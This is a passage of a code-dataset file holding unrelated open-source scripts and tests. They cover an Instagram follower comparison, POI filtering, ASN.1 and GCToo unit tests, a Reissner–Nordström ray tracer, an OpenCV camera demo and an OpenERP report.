extract_haters(owers_list, owing_list):\n    haters = []\n    for following in owing_list:\n        if following not in owers_list:\n            haters.append(following)\n    return(haters)\n\ndef owers():\n    extract_driver(1)\n\ndef owing():\n    extract_driver(2)\n\ndef main_thread():\n    t1 = Thread(target = owers)\n    t2 = Thread(target = owing)\n    t1.start()\n    t2.start()\n    # wait for both scraping threads to finish before comparing their results\n    t1.join()\n    t2.join()\n\nif __name__ == '__main__':\n\n    owers_list = []\n    owing_list = []\n\n    main_thread()\n\n    print(extract_haters(owers_list[0], owing_list[0]))\n","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"167535124","text":"########## IMPORT LIBRARIES ########## \n\n# sys is required to use the open function to write on file\nimport sys\n# pandas is needed to read the csv file and to perform some basic operations on dataframes\nimport pandas as pd\n# ST_AsGeoJSON returns a json object, so we can use json.load to parse it\nimport json\n# to read and write on csv\nimport csv\n# transform coordinates into string codes \nimport sklearn.neighbors as neigh\n# compute the nearest neighbors of a set of points\nfrom sklearn.neighbors import NearestNeighbors\n# to perform normalization of the dataframe\nfrom sklearn import preprocessing\n# operations on arrays\nimport numpy as np\n# date format \nimport datetime\n# manipulation of time format\nimport time\n\n\n########## IMPORT MY SCRIPTS ########## \n\nfrom build_loc_feat import from_array_to_string\n\n\n########## MAIN FUNCTION ##########\n\ndef main():\n\n    if len(sys.argv) <= 2:\n        return -1\n\n    stop = sys.argv[1]\n    id_area = sys.argv[2]\n\n    df_areas = pd.read_csv('../../datasets/in/Traj' + stop + 'min/vehicle_areas.csv')\n\n    df_areas = df_areas[df_areas[\"area\"] == int(id_area)]\n    bottom_left_y_min = df_areas[\"bottom_left_y\"].min()\n    bottom_left_x_min = df_areas[\"bottom_left_x\"].min()\n    top_right_y_min = df_areas[\"top_right_y\"].max()\n    top_right_x_min = df_areas[\"top_right_x\"].max()\n\n    with open('../../datasets/POIdict.json', 'r') as f:\n        dict_poi = json.load(f)\n\n    file_name_in = ['../../datasets/euro_pofw.csv', '../../datasets/euro_poi.csv', '../../datasets/euro_transport_traffic.csv']\n\n    file_name_out = '../../datasets/athens_POI.csv'\n    header = \"fclass,category,lon,lat\\n\"\n\n    # write 
header\n with open(file_name_out, 'w', newline='\\n') as f:\n f.write(header)\n\n for f in file_name_in:\n df = pd.read_csv(f)\n\n for _, row in df.iterrows():\n lat = row[\"lat\"]\n lon = row[\"lon\"]\n\n # if the poi is in the area selected\n if bottom_left_y_min < lat < top_right_y_min and bottom_left_x_min < lon < top_right_x_min:\n fclass = row[\"fclass\"]\n # if it's of a category we're interested in\n if fclass in dict_poi.keys():\n category = dict_poi[fclass]\n\n # write the row in the dataset\n with open(file_name_out, 'a', newline='\\n') as f:\n line = [fclass, category, lon, lat]\n f.write(from_array_to_string(line)+\"\\n\")\n \n return 0\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"python/clean_POI.py","file_name":"clean_POI.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648507553","text":"import data\nimport hq_trivia as h\n\nquestion_data = data.get_data()\n#---------\n#test ratio\n#----------\nratio_num_correct = 0\nratio_num_tested = 0\ndef test_ratio():\n global ratio_num_correct\n global ratio_num_tested\n for datum in question_data:\n q = datum[0]\n a = datum[1][0]\n b = datum[1][1]\n c = datum[1][2]\n answer = datum[2]\n if answer == h.get_best_ratio(q, a, b, c):\n ratio_num_correct += 1\n ratio_num_tested += 1\n \n#----------------\n#test most search\n#----------------\nmost_num_correct = 0\nmost_num_tested = 0\ndef test_most_search():\n global most_num_correct\n global most_num_tested\n for datum in question_data:\n q = datum[0]\n a = datum[1][0]\n b = datum[1][1]\n c = datum[1][2]\n answer = datum[2]\n if answer == h.get_most_search(q, a, b, c):\n most_num_correct += 1\n most_num_tested += 1\n","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216522032","text":"#\n# This file is part of pyasn1-alt-modules software.\n#\n# Created by Russ Housley\n# Copyright (c) 2021, Vigil Security, LLC\n# License: http://vigilsec.com/pyasn1-alt-modules-license.txt\n#\nimport sys\nimport unittest\n\nfrom pyasn1.codec.der.decoder import decode as der_decoder\nfrom pyasn1.codec.der.encoder import encode as der_encoder\n\nfrom pyasn1.type import univ\n\nfrom pyasn1_alt_modules import pem\nfrom pyasn1_alt_modules import rfc5652\nfrom pyasn1_alt_modules import rfc9044\n\n\nclass AuthenticatedDataGMAC128TestCase(unittest.TestCase):\n pem_text = \"\"\"\\\nMIIBHQYLKoZIhvcNAQkQAQKgggEMMIIBCAIBADFRok8CAQQwIwQQ+28rOVL9dEnS\nmPaKpLzZTRgPMjAyMDExMTAxMjAwMDBaMAsGCWCGSAFlAwQBLQQYDMG1WyligADX\nAF3DS35MotxnNdU65N7xMBsGCWCGSAFlAwQBCTAOBAy9T+z9c30p5UGfMH6hCwYJ\nYIZIAWUDBAIBMCsGCSqGSIb3DQEHAaAeBBxUaGlzIGlzIHNvbWUgc2FtcGxlIGNv\nbnRlbnQuokswGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAvBgkqhkiG9w0BCQQx\nIgQgyHXfKkIQcEqe3du238yHBHEWj5BNGDMYu/GErAsEXlMEDIbpDtygvp/XTdWc\nNw==\n\"\"\"\n\n def setUp(self):\n self.asn1Spec = rfc5652.ContentInfo()\n\n def testDerCodec(self):\n substrate = pem.readBase64fromText(self.pem_text)\n asn1Object, rest = der_decoder(substrate, asn1Spec=self.asn1Spec)\n\n self.assertFalse(rest)\n self.assertTrue(asn1Object.prettyPrint())\n self.assertEqual(substrate, der_encoder(asn1Object))\n\n ad, rest = der_decoder(\n asn1Object['content'],\n asn1Spec=rfc5652.AuthenticatedData())\n\n self.assertFalse(rest)\n self.assertTrue(ad.prettyPrint())\n self.assertEqual(asn1Object['content'], der_encoder(ad))\n\n self.assertEqual(0, ad['version'])\n 
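# the MAC algorithm for this sample is AES-128 GMAC (RFC 9044)\n        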
self.assertEqual(\n rfc9044.id_aes128_GMAC,\n ad['macAlgorithm']['algorithm'])\n\n param, rest = der_decoder(\n ad['macAlgorithm']['parameters'],\n asn1Spec=rfc9044.GCMParameters())\n\n self.assertFalse(rest)\n self.assertTrue(ad.prettyPrint())\n self.assertEqual(ad['macAlgorithm']['parameters'], der_encoder(param))\n\n iv = univ.OctetString(hexValue='bd4fecfd737d29e5419f307e')\n self.assertEqual(iv, param['nonce'])\n self.assertEqual(12, param['length'])\n\n def testOpenTypes(self):\n substrate = pem.readBase64fromText(self.pem_text)\n asn1Object, rest = der_decoder(substrate,\n asn1Spec=self.asn1Spec,\n decodeOpenTypes=True)\n\n self.assertFalse(rest)\n self.assertTrue(asn1Object.prettyPrint())\n self.assertEqual(substrate, der_encoder(asn1Object))\n\n ad = asn1Object['content']\n self.assertEqual(0, ad['version'])\n self.assertEqual(\n rfc9044.id_aes128_GMAC,\n ad['macAlgorithm']['algorithm'])\n\n param = ad['macAlgorithm']['parameters']\n iv = univ.OctetString(hexValue='bd4fecfd737d29e5419f307e')\n self.assertEqual(iv, param['nonce'])\n self.assertEqual(12, param['length'])\n\n\nsuite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])\n\nif __name__ == '__main__':\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/test_rfc9044.py","file_name":"test_rfc9044.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507885064","text":"#!/usr/bin/python\n\nuser_id = '10045092'\n\nimport json\nwith open('/vagrant/data/osn-data/matrices/{}.json'.format(user_id), 'r') as file:\n matrix = json.load(file)\n\n# mean w variance w momentum w entropy\n\nimport numpy\nimport scipy.stats\n\nmean = numpy.mean(matrix, axis=0)\nvariance = numpy.var(matrix, axis=0)\n\nnp_matrix = numpy.array(matrix)\nentropy = []\nfor i in range(len(matrix[0])):\n occu = {}\n for e in np_matrix[:,i]:\n if str(e) in occu:\n occu[str(e)] = occu[str(e)] + 1\n else:\n occu[str(e)] = 1\n count = occu.values()\n prob = []\n for c in count:\n prob.append(c/sum(count))\n entropy.append(scipy.stats.entropy(prob))\n\n#import numpy.ndarray\n\nwith open('/vagrant/data/osn-data/matrices/mean_{}.json'.format(user_id), 'w') as file:\n json.dump(mean.tolist(), file)\n\nwith open('/vagrant/data/osn-data/matrices/variance_{}.json'.format(user_id), 'w') as file:\n json.dump(variance.tolist(), file)\n\nwith open('/vagrant/data/osn-data/matrices/entropy_{}.json'.format(user_id), 'w') as file:\n json.dump(entropy, file)\n\nprint(mean)\nprint(variance)\nprint(entropy)\n\n#np_mean = numpy.array(mean)\n#for i in range(len(mean)-1):\n# print(np_mean[:,i])\n# print(np_mean[:,(len(mean)-1)])\n# print(scipy.stats.ttest_ind(np_mean[:,i],np_mean[:,(len(mean)-1)]))\n #print(scipy.stats.ttest_ind([1,2],[3,4]))\n","sub_path":"src/osn-data/old2/6stats.py","file_name":"6stats.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"318619830","text":"import numpy as np\r\nimport math\r\nimport scipy.integrate as sci\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nImage.MAX_IMAGE_PIXELS = None\r\n\r\ndef Reis(t, v): #Reissner-Nordström equations of motion.\r\n return np.array([v[2], L/v[0]**2, -L**2 * (3*M*v[0]-v[0]**2-2*Q)/v[0]**5]) \r\n\r\ndef R(t, v): #The celestial sphere of the observer.\r\n return (v[0]*math.cos(v[1]) + r0)**2 + (v[0]*math.sin(v[1]))**2 - rlimit**2\r\n\r\nR.terminal = True #Finishes at the celestial 
sphere.\r\n\r\ndef horizon(t, v): #The event horizon of the black hole.\r\n return v[0]-(M+np.sqrt(M**2-Q)) \r\n\r\nhorizon.terminal = True #Finishes at event horizon.\r\n\r\ndef hole(radius, shift=[0,0]): #Plots the event horizon filled in black.\r\n C = [[shift[0]+radius*math.cos(x), shift[1]+radius*math.sin(x)] for x in np.linspace(0,2*math.pi,80)]\r\n X,Y = zip(*C)\r\n plt.plot(X,Y, 'black')\r\n plt.fill(X,Y, 'black')\r\n \r\ndef Celestial(radius, shift=[0,0]): #Plots the celestial sphere.\r\n C = [[shift[0]+radius*math.cos(x), shift[1]+radius*math.sin(x)] for x in np.linspace(0,2*math.pi,80)]\r\n X,Y = zip(*C)\r\n plt.plot(X,Y, 'black')\r\n \r\ndef orbitpath(r, phi): #Plots the solution of the equations of motion.\r\n polar = zip(r, phi)\r\n cart = map(lambda x: [x[0]*math.cos(x[1]), x[0]*math.sin(x[1])], polar)\r\n x,y = zip(*cart)\r\n p = plt.plot(x,y, 'r-')\r\n plt.axis([-3,3,-3,3])\r\n hole(M+np.sqrt(M**2-Q))\r\n plt.axes().set_aspect('equal')\r\n return p\r\n\r\ndef orbitpath2(r, phi): #Same as first but for different line colour/ types.\r\n polar = zip(r, phi)\r\n cart = map(lambda x: [x[0]*math.cos(x[1]), x[0]*math.sin(x[1])], polar)\r\n x,y = zip(*cart)\r\n p = plt.plot(x,y,'k--')\r\n plt.axis([-10,10,-10,10])\r\n hole(M+np.sqrt(M**2-Q))\r\n plt.axes().set_aspect('equal')\r\n return p\r\n\r\ndef f(x): #Used to interpolate apparent angle.\r\n return np.interp(x,alpha1,alpha1s)\r\n\r\ndef pixelmap(k,l): #Uses relationship to map pixels.\r\n i = k - blackhole[0]\r\n j = l - blackhole[1]\r\n r = np.sqrt((i)**2+(j)**2)\r\n theta = np.arctan2(j,i)\r\n phi = np.arctan2(r,fclength)\r\n x,y = (np.tan(f(phi))*np.cos(theta)*fclength, np.tan(f(phi))*np.sin(theta)*fclength)\r\n if -blackhole[0] <= x <= im.size[0]-blackhole[0] and -blackhole[1] <= y <= im.size[1]-blackhole[1]:\r\n return pixels[x+blackhole[0],y+blackhole[1]]\r\n else:\r\n return (0,0,0)\r\n\r\nim = Image.open(\"Nebula_3.png\")\r\nnew_im = Image.new('RGB', (im.size[0],im.size[1]), 'black')\r\n\r\ntrange = [0., 300.] 
#Time range.\r\nfclength = im.size[0]/3 #Sets focal length of the camera.\r\nblackhole = [im.size[0]/2,im.size[1]/2] #Sets location of black hole in the image.\r\nM = 1 #Mass of the black hole.\r\nQ = 9*M**2/8 #Charge of the black hole, using notation choice Q = {r_Q}^2.\r\nr0 = 30 #Radius of where rays originate from.\r\nrlimit = 200 #Distance we have set celestial sphere from oberser.\r\nphi0 = np.pi #Angle from which rays originate from.\r\nalpha1 = []\r\nalpha1s = []\r\nalpha2 = []\r\nalpha2s = []\r\n#Initial conditions.\r\nv0p1 = [[[r0,math.pi,-1], L] for L in np.linspace(10.1, 100.0, 35)]\r\nv0p2= [[[r0,math.pi,-1], L] for L in np.linspace(5.2,10, 20)]\r\nv0p = v0p2 + v0p1\r\n\r\n#v0s1 = [[[r0,0.45,-1], 14.6]]\r\n#v0s2 = [[[r0,0.35,-1], 10.8]]\r\n#v0s3 = [[[r0,0.25,-1], 7.6]]\r\n#v0s4 = [[[r0,0.55,-1], 18.5]]\r\n#v0p = v0s1 + v0s2 + v0s3 + v0s4\r\n\r\n#v0p = [[[r,0,0],6] for r in np.linspace(4,17,5)]\r\n#v0p = [[[10,np.pi,-1],5.8685]]\r\n#v0p = [[[r,0,0],1] for r in np.linspace((3*M + np.sqrt(9*M**2 - 8*Q))/2 - 0.1,(3*M + np.sqrt(9*M**2 - 8*Q))/2 + 0.1,2)]\r\n\r\nfor v0 in v0p: #Solves equations of motion in range of initial conditions.\r\n L = v0[1]\r\n sol = sci.solve_ivp(Reis, trange, np.array(v0[0]), events = [horizon, R], t_eval = np.linspace(trange[0], trange[1], 10000))\r\n p = orbitpath(sol.y[0], sol.y[1])\r\n rfinal = sol.y[0][-1]\r\n phifinal = sol.y[1][-1]\r\n xfinal = rfinal * math.cos(phifinal)\r\n yfinal = rfinal * math.sin(phifinal)\r\n alpha1.append(math.atan2(v0[1]/v0[0][0], -v0[0][2])) #Appends apparent angle.\r\n alpha1s.append(-math.atan2(yfinal, r0 + xfinal)) #Appends actual angle.\r\nCelestial(rlimit, shift = [-r0,0])\r\nplt.xlabel('x/M')\r\nplt.ylabel('y/M')\r\n#plt.savefig('slightE.png', dpi=300) #Used to save images.\r\n#plt.show()\r\n\r\n#For comparison to Schwarzschild case.\r\n\r\n#v0p1 = [[[r0,math.pi,-1], L] for L in np.linspace(10.1, 100.0, 35)]\r\n#v0p2= [[[r0,math.pi,-1], L] for L in np.linspace(5.8,10, 20)]\r\n#v0p = v0p2 + v0p1\r\n#\r\nfor v0 in v0p: #Solves equations of motion in range of initial conditions.\r\n Q=0\r\n L = v0[1]\r\n sol = sci.solve_ivp(Reis, trange, np.array(v0[0]), events = [horizon, R], t_eval = np.linspace(trange[0], trange[1], 10000))\r\n p = orbitpath2(sol.y[0], sol.y[1])\r\n rfinal = sol.y[0][-1]\r\n phifinal = sol.y[1][-1]\r\n xfinal = rfinal * math.cos(phifinal)\r\n yfinal = rfinal * math.sin(phifinal)\r\n alpha2.append(math.atan2(v0[1]/v0[0][0], -v0[0][2])) \r\n alpha2s.append(-math.atan2(yfinal, r0 + xfinal))\r\nCelestial(rlimit, shift = [-r0,0])\r\nplt.xlabel('x/M')\r\nplt.ylabel('y/M')\r\nplt.plot(0,0,'r-',label = 'Reissner-Nordström Black Hole')\r\nplt.plot(0,0,'k--', label = 'Schwarzschild Black Hole')\r\nplt.legend(loc = 'lower right')\r\nplt.savefig('LoopR.png', dpi=300) #Used to save images.\r\nplt.show()\r\n\r\n\r\n#Produces the angle map.\r\nn = np.linspace(0,1.4,100)\r\nplt.plot(alpha1,alpha1s, label ='Reissner-Nordström Black Hole')\r\n#plt.plot(alpha2,alpha2s, '--', label ='Schwarzschild Black Hole')\r\nplt.plot(n,n,'k--')\r\nplt.xlabel('Alpha Prime')\r\nplt.ylabel('Alpha')\r\nplt.axis([0,1.5,-1.5,1.5])\r\nplt.legend(loc = 'lower right')\r\n#plt.savefig('AngleMapR.png', dpi=300)\r\nplt.show()\r\n\r\n \r\n#pixels = im.load()\r\n#new_pixels = new_im.load()\r\n#\r\n#for i in range(im.size[0]):\r\n# for j in range(im.size[1]):\r\n# new_pixels[i,j] = pixelmap(i,j)\r\n#new_im.show()\r\n#im.show()\r\n#\r\n#new_im.save(\"NebulaBlackHoleR.png\", 'PNG') #Saves the produced 
image.","sub_path":"Reissner.py","file_name":"Reissner.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601630520","text":"\"\"\" appengine-dscache: A datastore-based implementation of memcache\n\nDocs and examples: http://code.google.com/p/appengine-dscache/\n\nCopyright 2010 VendAsta Technologies Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\nSee http://code.google.com/p/appengine-dscache/wiki/GettingStarted for instructions.\n\"\"\"\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import util\nfrom vacuum import Vacuum\n\ndef createApplication():\n \"\"\"Create new WSGIApplication and register all handlers.\n\n Returns:\n an instance of webapp.WSGIApplication with all dscache handlers registered.\n \"\"\"\n return webapp.WSGIApplication([\n (r\"^/[^\\/]+/vacuum/\", Vacuum)\n ],\n debug=True)\n\nAPP = createApplication()\n\ndef main():\n \"\"\" Main entry point. \"\"\"\n util.run_wsgi_app(APP)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/dscache/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111077946","text":"# This program demonstrates the usage of the camera through the OpenCV library.\n# A simple camera feed is displayed on screen, with the current frames per second.\n# See https://www.learnopencv.com/read-write-and-display-a-video-using-opencv-cpp-python/ for more details.\n\nimport cv2\nimport time\n\nFPS_SMOOTHING = 0.9\n\n# Initialize camera with a specified resolution.\n# It may take some experimenting to find other valid resolutions,\n# as the camera may end up displaying an incorrect image.\n# Alternatively, frames can be resized afterwards using the resize() function.\ncapture = cv2.VideoCapture(0)\ncapture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncapture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nif not capture.isOpened():\n print(\"Failed to open camera!\")\n exit()\n\nfps, prev = 0.0, 0.0\nwhile True:\n # Calculate FPS\n now = time.time()\n fps = (fps*FPS_SMOOTHING + (1/(now - prev))*(1.0 - FPS_SMOOTHING))\n prev = now\n\n # Get a frame\n ret, frame = capture.read()\n if not ret:\n break\n\n # Write text onto the frame\n cv2.putText(frame, \"FPS: {:.1f}\".format(fps), (5, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,0))\n \n # Display the frame\n cv2.imshow(\"Preview - Press Esc to exit\", frame)\n \n # Check for user input\n c = cv2.waitKey(1)\n if c == 27 or c == ord('q') or c == ord('Q'): # Esc or Q\n break\n","sub_path":"Sample Programs (NEW!!!)/python/6_CameraTest/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403311396","text":"import unittest\nimport pandas as pd\nimport numpy as np\nimport GCToo\nimport logging\nimport setup_GCToo_logger\n\n\nlogger = 
logging.getLogger(setup_GCToo_logger.LOGGER_NAME)\n\nclass TestGCToo(unittest.TestCase):\n def test_assemble_multi_index_df(self):\n\n # TODO: Add test of only row ids present as metadata\n # TODO: Add test of only col ids present as metadata \n\n g = GCToo.GCToo()\n \n g.row_metadata_df = pd.DataFrame({\"a\":range(3)}, index=range(4,7))\n logger.debug(\"g.row_metadata_df: {}\".format(g.row_metadata_df))\n\n g.col_metadata_df = pd.DataFrame({\"b\":range(7,10)}, index=range(10,13))\n logger.debug(\"g.col_metadata_df: {}\".format(g.col_metadata_df))\n\n g.data_df = pd.DataFrame({10:range(13,16), 11:range(16,19), 12:range(19,22)}, index=range(4,7))\n logger.debug(\"g.data_df: {}\".format(g.data_df))\n\n g.assemble_multi_index_df()\n logger.debug(\"g.multi_index_df: {}\".format(g.multi_index_df))\n\n assert \"a\" in g.multi_index_df.index.names, g.multi_index_df.index.names\n assert \"rid\" in g.multi_index_df.index.names, g.multi_index_df.index.names\n\n assert \"b\" in g.multi_index_df.columns.names, g.multi_index_df.columns.names\n assert \"cid\" in g.multi_index_df.columns.names, g.multi_index_df.columns.names\n\n r = g.multi_index_df.xs(7, level=\"b\", axis=1)\n logger.debug(\"r: {}\".format(r))\n assert r.xs(4, level=\"rid\", axis=0).values[0][0] == 13, r.xs(4, level=\"rid\", axis=0).values[0][0]\n assert r.xs(5, level=\"rid\", axis=0).values[0][0] == 14, r.xs(5, level=\"rid\", axis=0).values[0][0]\n assert r.xs(6, level=\"rid\", axis=0).values[0][0] == 15, r.xs(6, level=\"rid\", axis=0).values[0][0]\n\n def test_init(self):\n # Create test data\n data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"c\"])\n row_metadata_df = pd.DataFrame([[\"rhd_A\", \"rhd_B\"], [\"rhd_C\", \"rhd_D\"]],\n index=[\"A\", \"B\"], columns=[\"rhd1\", \"rhd2\"])\n col_metadata_df = pd.DataFrame([\"chd_a\", \"chd_b\", \"chd_c\"],\n index=[\"a\", \"b\", \"c\"], columns=[\"chd1\"])\n\n # happy path\n GCToo.GCToo(data_df=data_df, row_metadata_df=row_metadata_df,\n col_metadata_df=col_metadata_df)\n\n def test_check_uniqueness(self):\n not_unique_data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"a\"])\n not_unique_rhd = pd.DataFrame([[\"rhd_A\", \"rhd_B\"], [\"rhd_C\", \"rhd_D\"]],\n index=[\"A\", \"B\"], columns=[\"rhd1\", \"rhd1\"])\n\n # cids in data_df are not unique\n with self.assertRaises(AssertionError) as e:\n GCToo.GCToo(data_df=not_unique_data_df)\n self.assertIn(\"'a' 'b' 'a'\", str(e.exception))\n\n # rhds are not unique in row_metadata_df\n with self.assertRaises(AssertionError) as e:\n GCToo.GCToo(row_metadata_df=not_unique_rhd)\n self.assertIn(\"'rhd1' 'rhd1'\", str(e.exception))\n\n def test_rid_consistency_check(self):\n data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"c\"])\n inconsistent_rids = pd.DataFrame([[\"rhd_A\", \"rhd_B\"], [\"rhd_C\", \"rhd_D\"]],\n index=[\"A\", \"C\"], columns=[\"rhd1\", \"rhd2\"])\n with self.assertRaises(AssertionError) as e:\n GCToo.GCToo.rid_consistency_check(GCToo.GCToo(\n data_df=data_df, row_metadata_df=inconsistent_rids))\n self.assertIn(\"The rids are inconsistent\", str(e.exception))\n\n def test_cid_consistency_check(self):\n data_df = pd.DataFrame([[1, 2, 3], [4, 5, 6]],\n index=[\"A\", \"B\"], columns=[\"a\", \"b\", \"c\"])\n inconsistent_cids = pd.DataFrame([\"chd_a\", \"chd_b\", \"chd_c\"],\n index=[\"a\", \"b\", \"C\"], columns=[\"chd1\"])\n with self.assertRaises(AssertionError) as e:\n 
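# cid \"C\" in col_metadata_df has no matching column in data_df\n            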
GCToo.GCToo.cid_consistency_check(GCToo.GCToo(\n data_df=data_df, col_metadata_df=inconsistent_cids))\n self.assertIn(\"The cids are inconsistent\", str(e.exception))\n\n def test_multi_index_df_to_component_dfs(self):\n mi_df_index = pd.MultiIndex.from_arrays(\n [[\"D\", \"E\"], [-666, -666], [\"dd\", \"ee\"]],\n names=[\"rid\", \"rhd1\", \"rhd2\"])\n mi_df_columns = pd.MultiIndex.from_arrays(\n [[\"A\", \"B\", \"C\"], [1, 2, 3], [\"Z\", \"Y\", \"X\"]],\n names=[\"cid\", \"chd1\", \"chd2\"])\n mi_df = pd.DataFrame(\n [[1, 3, 5], [7, 11, 13]],\n index=mi_df_index, columns=mi_df_columns)\n\n e_row_metadata_df = pd.DataFrame(\n [[-666, \"dd\"], [-666, \"ee\"]],\n index=pd.Index([\"D\", \"E\"], name=\"rid\"),\n columns=pd.Index([\"rhd1\", \"rhd2\"], name=\"rhd\"))\n e_col_metadata_df = pd.DataFrame(\n [[1, \"Z\"], [2, \"Y\"], [3, \"X\"]],\n index=pd.Index([\"A\", \"B\", \"C\"], name=\"cid\"),\n columns=pd.Index([\"chd1\", \"chd2\"], name=\"chd\"))\n e_data_df = pd.DataFrame(\n [[1, 3, 5], [7, 11, 13]],\n index=pd.Index([\"D\", \"E\"], name=\"rid\"),\n columns=pd.Index([\"A\", \"B\", \"C\"], name=\"cid\"))\n\n (data_df, row_df, col_df) = GCToo.multi_index_df_to_component_dfs(mi_df)\n\n self.assertTrue(col_df.equals(e_col_metadata_df))\n self.assertTrue(row_df.equals(e_row_metadata_df))\n self.assertTrue(data_df.equals(e_data_df))\n\nif __name__ == \"__main__\":\n setup_GCToo_logger.setup(verbose=True)\n\n unittest.main()\n\n","sub_path":"python/broadinstitute_cmap/io/GCToo/test_GCToo.py","file_name":"test_GCToo.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483100994","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2007 - 2009 Corvus Latinoamerica, C.A. (http://corvus.com.ve) All Rights Reserved\n# \n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsability of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs \n# End users who are looking for a ready-to-use solution with commercial\n# garantees and support are strongly adviced to contract a Free Software\n# Service Company \n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the \n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n##############################################################################\n\nfrom report import report_sxw\nfrom osv import osv\nimport pooler\n\nclass partner_bycategory(report_sxw.rml_parse):\n\n\tdef __init__(self, cr, uid, name, context):\n\t\tsuper(partner_bycategory, self).__init__(cr, uid, name, context)\n\t\tself.localcontext.update({\n\t\t\t'get_partner_information': self._get_partner_information,\n\t\t})\n\t\n\t\t\n\tdef _get_partner_information(self,category_id,subcateg):\n\t\tresp = []\n\t\tif category_id: \n\t\t\tids_str = category_id\n\t\t\tif subcateg: \n\t\t\t\tcatg_ids = self.pool.get('res.partner.category').search(self.cr, self.uid, [('parent_id', 'child_of', [category_id])])\t\t\t\n\t\t\t\tids_str = ','.join(map(str,catg_ids))\t\t \n\t\t\tsql = \"\"\"\t\n\t\t\tSELECT\tc.id,c.name,p.name,p.vat\n\t\t\tFROM\t\tres_partner_category_rel AS r \n\t\t\tINNER JOIN res_partner AS p ON r.partner_id=p.id \n\t\t\tINNER JOIN res_partner_category AS c ON r.category_id=c.id \n\t\t\tWHERE\tr.category_id in ( %s ) \n\t\t\tORDER BY c.name,p.name;\"\"\" %ids_str\n\t\t\t#print sql \n\t\t\tself.cr.execute(sql)\n\t\t\tcatg_id = 0\n\t\t\tfor reg in self.cr.fetchall():\n\t\t\t\tif catg_id==reg[0]: \n\t\t\t\t\tresp.append({\"catg\":'',\"nomb\":reg[2],\"rif\":reg[3]})\n\t\t\t\telse:\n\t\t\t\t\tcatg_id = reg[0]\n\t\t\t\t\tresp.append({\"catg\":reg[1],\"nomb\":reg[2],\"rif\":reg[3]})\n\t\treturn resp\n\nreport_sxw.report_sxw('report.partner_by_category','res.partner','addons/custom_american/custom_partner/report/report_partner_category.rml',parser=partner_bycategory, header=False )\n","sub_path":"custom_partner/report/report_partner_category.py","file_name":"report_partner_category.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238226705","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef cauchy(x):\n return 1.0 / (math.pi * (1 + x**2) )\n\ninputs = open(\"inputs.txt\")\nnvec = [ n.strip(\"\\n\") for n in inputs.readlines()[1:] ]\n\nfor n in nvec:\n fname = \"n\" + n + \"histogram.out\"\n data = np.loadtxt(fname)\n\n delta_x = data[1,0] - data[0,0]\n normalisation = np.sum(data[:,1], dtype=np.float)\n\n cauchy_data = cauchy(data[:,0])\n cauchy_normalisation = np.sum(cauchy_data, dtype=np.float)\n \n plt.figure(n)\n plt.xlabel(r\"$x$\")\n plt.ylabel(\"Probability\")\n plt.title(\"Sampling: $n = $\"+n)\n\n plt.bar(data[:,0], data[:,1]/normalisation, width=delta_x, label=\"Sampled\") # plot Metroplis data\n plt.plot(data[:,0], 